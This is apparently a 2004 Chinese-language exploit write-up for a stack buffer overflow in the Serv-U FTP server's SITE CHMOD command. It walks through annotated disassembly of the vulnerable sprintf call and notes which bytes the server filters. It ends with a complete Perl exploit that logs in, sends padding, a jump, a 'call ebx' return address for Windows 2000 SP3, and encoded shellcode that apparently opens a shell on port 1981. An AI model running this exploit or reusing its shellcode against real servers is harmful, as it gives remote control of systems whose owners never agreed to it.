分析server-u site chmod 漏洞
author:wujianqiang 18/2/2004 email :wujianqiangis@mail.china.com homepage:http://wujianqiang.533.net
Q:郁闷的时候干啥? A:玩exp...
其实这个程序调不难,就是shellcode要求有点麻烦;)
开始调时从每个命令开始调的,费事还不如让它自己跑来得快 loc_4190E8 关系 |_loc_41953d
sub_4190E8 proc near ; CODE XREF: sub_41824C+11Ep .text:004190E8 buffer = byte ptr -1ECh //the buffer
loc_41953D: ; CODE XREF: sub_4190E8+441j .text:0041953D push [ebp+var_8] //用户的输入的地址,shellcode被过滤了看下面 后面的sprintf继续使用,包含路径 .text:00419540 push 0FFFFFFFFh .text:00419542 push 4B4h .text:00419547 lea eax, [esi+8460h] .text:0041954D push eax .text:0041954E call sub_4143F0 //这里没跟进去 对文件名没影响 .text:00419553 add esp, 0Ch //平衡堆栈 注意add esp,0xc 3 个参数 .text:00419556 push eax ; format // .text:00419557 lea edx, [ebp+buffer] .text:0041955D push edx ; buffer .text:0041955E call _sprintf //一个不安全函数导致溢出 .text:00419563 add esp, 0Ch .text:00419566 lea ecx, [ebp+buffer] .text:0041956C push ecx .text:0041956D push esi .text:0041956E call sub_432AA8 //此处没影响 .text:00419573 add esp, 8 .text:00419576 dec [ebp+var_38] .text:00419579 dec [ebp+var_38] .text:0041957C cmp [ebp+var_8], 0 .text:00419580 jz loc_41960F //注意覆盖时不能ebp-var_38为2否则转走:) .text:00419586 mov eax, [ebp+var_8] //覆盖了var_8 .text:00419589 mov edx, [eax-0Ch] //这里发生异常 fs:0 -> 被覆盖 看下面dbg分析 .text:0041958C inc edx
非常一个普通的溢出,美齐明曰:格式话导致普通堆栈溢出,加个n or %.xxs 注意后面会多出来buffer中500 / 就是shellcode不太好写 1.首先在ebp+var_38 不能为2 否则跳走没跟踪。 还有因为我从这里跟踪的_loc_41953d 所以前面对字符的转化没法控制 经过抓包测试 @1 \x5c "\" 被转化为 0x2f "/" @2 \0xa "\n"被去掉 @3 \xff\xff\xff 被去掉一个 \xff\xff 简单添加两个\xff\xff ,我也不知道为啥 所以还得修改那些通用的shellcode,使期符合条件,给eyas的代码前面加了一段解码函数使期符合条件
404 staff|jmp 0x38 nop nop| call ebx |"a"x50|shellcode
用perl 写个exp
#perl.exe #use call ebx as the ret #tested on Win2k sp3 Serv-u 4.0 #by wujianqiang wujianqiangis@mail.china.com #copyright 2004 use IO::Socket; if ($#ARGV<2){printf " usage:serv-u.pl IP <username> <passwd> ";exit(1);} $host = @ARGV[0]; $port = 21; $user = @ARGV[1]; $pass = @ARGV[2]; $sc= "\xEB\x1f\x5A\x57\x52\x5F\x4A\x33\xC9\xB1\x09\xFE\xC1\x83\xEF\x0B\x88". "\x0F\x5F\x33\xC9\x66\xb9\x66\x01\x80\x34\xff\x99\xE2\xFA\xEB\x05\xE8". "\xdc\xFF\xFF\xFF\xff\xff". "\x70\x99\x98\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85". "\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A". "\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A". "\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC". "\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58". "\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12". "\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71". "\xE5\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3". "\x9D\xC0\x71\xF0\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66". "\xCE\x69\x12\x41\x5E\x9E\x9B\x99\x9E\x24\xAA\x59\x10\xDE\x9D\xF3". "\x89\xCE\xCA\x66\xCE\x6D\xF3\x98\xCA\x66\xCE\x61\xC9\xC9\xCA\x66". "\xCE\x65\x1A\x75\xDD\x12\x6D\xAA\x42\xF3\x89\xC0\x10\x85\x17\x7B". "\x62\x10\xDF\xA1\x10\xDF\xA5\x10\xDF\xD9\x5E\xDF\xB5\x98\x98\x99". "\x99\x14\xDE\x89\xC9\xCF\xCA\xCA\xCA\xF3\x98\xCA\xCA\x5E\xDE\xA5". "\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xCA\x66\xCE\x7D\xC9\x66\xCE\x71". "\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32". "\x7B\x77\xAA\x59\x5A\x71\x62\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6". "\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9". "\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA". "\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8". "\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC". "\xED\xD8\x99\xFB\xF0\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8". "\xFA\xFA\xFC\xE9\xED\x99"; $pad="/"; $pad=$pad."a"x403; #staff a...a $jmpover="\xeb\x38\x90\x90"; $jmpover2="a"x50; $callebx="\x7a\x36\xe6\x77"; #call ebx at kernel32 win2k sp3 $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>SOCK_STREAM) or die "Couldn't connect: @!\n"; print $socket "user$user\r\n"; sleep(5); print $socket "pass$pass\r\n"; sleep(5); print $socket "site chmod 777 $pad$jmpover$callebx$jmpover2$sc \r\n"; print "you may try to telnet 1981 for a test\r\n"; print "exp by wujianqiang wujianqiangis@mail.china.com\r\n"; print "welcome to http://wujianqiang.533.net\r\n"; close($socket); |